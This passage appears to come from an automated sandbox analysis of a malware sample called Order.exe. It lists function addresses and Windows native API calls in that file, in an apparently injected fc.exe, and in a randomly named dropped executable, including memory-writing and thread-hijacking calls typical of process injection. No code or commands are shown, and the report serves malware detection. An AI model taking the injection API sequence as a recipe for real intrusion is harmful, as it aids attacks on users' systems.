                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02D00 NtSetInformationFile,9_2_01A02D00
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02D10 NtMapViewOfSection,9_2_01A02D10
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02CA0 NtQueryInformationToken,9_2_01A02CA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02CF0 NtOpenProcess,9_2_01A02CF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02CC0 NtQueryVirtualMemory,9_2_01A02CC0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02C00 NtQueryInformationProcess,9_2_01A02C00
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02C60 NtCreateKey,9_2_01A02C60
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02FA0 NtQuerySection,9_2_01A02FA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02FB0 NtResumeThread,9_2_01A02FB0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02F90 NtProtectVirtualMemory,9_2_01A02F90
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02FE0 NtCreateFile,9_2_01A02FE0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02F30 NtCreateSection,9_2_01A02F30
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02F60 NtCreateProcessEx,9_2_01A02F60
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02EA0 NtAdjustPrivilegesToken,9_2_01A02EA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02E80 NtReadVirtualMemory,9_2_01A02E80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02EE0 NtQueueApcThread,9_2_01A02EE0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02E30 NtWriteVirtualMemory,9_2_01A02E30
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A03090 NtSetValueKey,9_2_01A03090
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A03010 NtOpenDirectoryObject,9_2_01A03010
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A039B0 NtGetContextThread,9_2_01A039B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A03D10 NtOpenProcessToken,9_2_01A03D10
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A03D70 NtOpenThread,9_2_01A03D70
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03934340 NtSetContextThread,LdrInitializeThunk,12_2_03934340
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03934650 NtSuspendThread,LdrInitializeThunk,12_2_03934650
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_03932BA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_03932BF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932BE0 NtQueryValueKey,LdrInitializeThunk,12_2_03932BE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932B60 NtClose,LdrInitializeThunk,12_2_03932B60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932AD0 NtReadFile,LdrInitializeThunk,12_2_03932AD0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932AF0 NtWriteFile,LdrInitializeThunk,12_2_03932AF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932FB0 NtResumeThread,LdrInitializeThunk,12_2_03932FB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932FE0 NtCreateFile,LdrInitializeThunk,12_2_03932FE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932F30 NtCreateSection,LdrInitializeThunk,12_2_03932F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_03932E80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03932EE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932DD0 NtDelayExecution,LdrInitializeThunk,12_2_03932DD0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03932DF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03932D10
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03932D30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03932CA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03932C70
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932C60 NtCreateKey,LdrInitializeThunk,12_2_03932C60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039335C0 NtCreateMutant,LdrInitializeThunk,12_2_039335C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039339B0 NtGetContextThread,LdrInitializeThunk,12_2_039339B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932B80 NtQueryInformationFile,12_2_03932B80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932AB0 NtWaitForSingleObject,12_2_03932AB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932F90 NtProtectVirtualMemory,12_2_03932F90
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932FA0 NtQuerySection,12_2_03932FA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932F60 NtCreateProcessEx,12_2_03932F60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932EA0 NtAdjustPrivilegesToken,12_2_03932EA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932E30 NtWriteVirtualMemory,12_2_03932E30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932DB0 NtEnumerateKey,12_2_03932DB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932D00 NtSetInformationFile,12_2_03932D00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932CC0 NtQueryVirtualMemory,12_2_03932CC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932CF0 NtOpenProcess,12_2_03932CF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03932C00 NtQueryInformationProcess,12_2_03932C00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03933090 NtSetValueKey,12_2_03933090
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03933010 NtOpenDirectoryObject,12_2_03933010
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03933D10 NtOpenProcessToken,12_2_03933D10
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03933D70 NtOpenThread,12_2_03933D70
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03229300 NtClose,12_2_03229300
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03229260 NtDeleteFile,12_2_03229260
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03229170 NtReadFile,12_2_03229170
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03229000 NtCreateFile,12_2_03229000
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03229460 NtAllocateVirtualMemory,12_2_03229460
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_00EBD3840_2_00EBD384
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D022880_2_06D02288
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D022780_2_06D02278
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D0D2380_2_06D0D238
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D0D2280_2_06D0D228
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D0B0380_2_06D0B038
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D0CE000_2_06D0CE00
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D0AC000_2_06D0AC00
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D0CDF00_2_06D0CDF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_070909400_2_07090940
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_004186139_2_00418613
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_004168439_2_00416843
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0041683F9_2_0041683F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_004100F39_2_004100F3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_004028A09_2_004028A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_004030B09_2_004030B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0040E1739_2_0040E173
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0040E43E9_2_0040E43E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0042ECA39_2_0042ECA3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0040FED39_2_0040FED3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_004046D49_2_004046D4
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A901AA9_2_01A901AA
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A841A29_2_01A841A2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A881CC9_2_01A881CC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C01009_2_019C0100
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A1189_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A581589_2_01A58158
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A620009_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A903E69_2_01A903E6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE3F09_2_019DE3F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8A3529_2_01A8A352
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A502C09_2_01A502C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A702749_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A905919_2_01A90591
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D05359_2_019D0535
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7E4F69_2_01A7E4F6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A744209_2_01A74420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A824469_2_01A82446
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CC7C09_2_019CC7C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F47509_2_019F4750
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D07709_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EC6E09_2_019EC6E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A9A9A69_2_01A9A9A6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A09_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E69629_2_019E6962
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B68B89_2_019B68B8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE8F09_2_019FE8F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DA8409_2_019DA840
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D28409_2_019D2840
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A86BD79_2_01A86BD7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8AB409_2_01A8AB40
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA809_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E8DBF9_2_019E8DBF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CADE09_2_019CADE0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DAD009_2_019DAD00
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6CD1F9_2_01A6CD1F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70CB59_2_01A70CB5
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C0CF29_2_019C0CF2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0C009_2_019D0C00
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4EFA09_2_01A4EFA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C2FC89_2_019C2FC8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DCFE09_2_019DCFE0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A12F289_2_01A12F28
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A72F309_2_01A72F30
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F0F309_2_019F0F30
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A44F409_2_01A44F40
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E2E909_2_019E2E90
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8CE939_2_01A8CE93
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8EEDB9_2_01A8EEDB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8EE269_2_01A8EE26
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0E599_2_019D0E59
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DB1B09_2_019DB1B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A9B16B9_2_01A9B16B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0516C9_2_01A0516C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BF1729_2_019BF172
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A870E99_2_01A870E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8F0E09_2_01A8F0E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D70C09_2_019D70C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7F0CC9_2_01A7F0CC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A1739A9_2_01A1739A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8132D9_2_01A8132D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BD34C9_2_019BD34C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D52A09_2_019D52A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A712ED9_2_01A712ED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EB2C09_2_019EB2C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6D5B09_2_01A6D5B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A995C39_2_01A995C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A875719_2_01A87571
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8F43F9_2_01A8F43F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C14609_2_019C1460
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8F7B09_2_01A8F7B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A816CC9_2_01A816CC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A156309_2_01A15630
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A659109_2_01A65910
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D99509_2_019D9950
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EB9509_2_019EB950
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D38E09_2_019D38E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3D8009_2_01A3D800
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EFB809_2_019EFB80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A45BF09_2_01A45BF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0DBF99_2_01A0DBF9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FB769_2_01A8FB76
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A15AA09_2_01A15AA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A71AA39_2_01A71AA3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6DAAC9_2_01A6DAAC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7DAC69_2_01A7DAC6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A43A6C9_2_01A43A6C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FA499_2_01A8FA49
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A87A469_2_01A87A46
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EFDC09_2_019EFDC0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A87D739_2_01A87D73
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D3D409_2_019D3D40
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A81D5A9_2_01A81D5A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FCF29_2_01A8FCF2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A49C329_2_01A49C32
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D1F929_2_019D1F92
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FFB19_2_01A8FFB1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01993FD29_2_01993FD2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01993FD59_2_01993FD5
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FF099_2_01A8FF09
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D9EB09_2_019D9EB0
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A3F9DB11_2_00A3F9DB
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A341DC11_2_00A341DC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A4811B11_2_00A4811B
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A44A8B11_2_00A44A8B
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A3FBFB11_2_00A3FBFB
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A4634711_2_00A46347
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A4634B11_2_00A4634B
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A3DC7B11_2_00A3DC7B
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A5E7AB11_2_00A5E7AB
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A3DF4611_2_00A3DF46
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_039C133211_2_039C1332
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_039C330111_2_039C3301
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_039C9A5111_2_039C9A51
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_039C9A4D11_2_039C9A4D
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_039B78E211_2_039B78E2
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_039C30E111_2_039C30E1
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_039E1EB111_2_039E1EB1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390E3F012_2_0390E3F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039C03E612_2_039C03E6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BA35212_2_039BA352
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039802C012_2_039802C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039A027412_2_039A0274
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039C01AA12_2_039C01AA
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B41A212_2_039B41A2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B81CC12_2_039B81CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0399A11812_2_0399A118
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038F010012_2_038F0100
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0398815812_2_03988158
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0399200012_2_03992000
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038FC7C012_2_038FC7C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0392475012_2_03924750
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390077012_2_03900770
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0391C6E012_2_0391C6E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039C059112_2_039C0591
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390053512_2_03900535
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039AE4F612_2_039AE4F6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039A442012_2_039A4420
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B244612_2_039B2446
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B6BD712_2_039B6BD7
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BAB4012_2_039BAB40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038FEA8012_2_038FEA80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039029A012_2_039029A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039CA9A612_2_039CA9A6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0391696212_2_03916962
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038E68B812_2_038E68B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0392E8F012_2_0392E8F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390A84012_2_0390A840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390284012_2_03902840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0397EFA012_2_0397EFA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038F2FC812_2_038F2FC8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390CFE012_2_0390CFE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03920F3012_2_03920F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039A2F3012_2_039A2F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03942F2812_2_03942F28
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03974F4012_2_03974F40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03912E9012_2_03912E90
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BCE9312_2_039BCE93
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BEEDB12_2_039BEEDB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BEE2612_2_039BEE26
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03900E5912_2_03900E59
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03918DBF12_2_03918DBF
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038FADE012_2_038FADE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0399CD1F12_2_0399CD1F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390AD0012_2_0390AD00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039A0CB512_2_039A0CB5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038F0CF212_2_038F0CF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03900C0012_2_03900C00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0394739A12_2_0394739A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B132D12_2_039B132D
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038ED34C12_2_038ED34C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039052A012_2_039052A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0391B2C012_2_0391B2C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039A12ED12_2_039A12ED
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390B1B012_2_0390B1B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039CB16B12_2_039CB16B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038EF17212_2_038EF172
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0393516C12_2_0393516C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039070C012_2_039070C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039AF0CC12_2_039AF0CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B70E912_2_039B70E9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BF0E012_2_039BF0E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BF7B012_2_039BF7B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B16CC12_2_039B16CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0394563012_2_03945630
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0399D5B012_2_0399D5B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039C95C312_2_039C95C3
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B757112_2_039B7571
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BF43F12_2_039BF43F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038F146012_2_038F1460
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0391FB8012_2_0391FB80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03975BF012_2_03975BF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0393DBF912_2_0393DBF9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BFB7612_2_039BFB76
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03945AA012_2_03945AA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0399DAAC12_2_0399DAAC
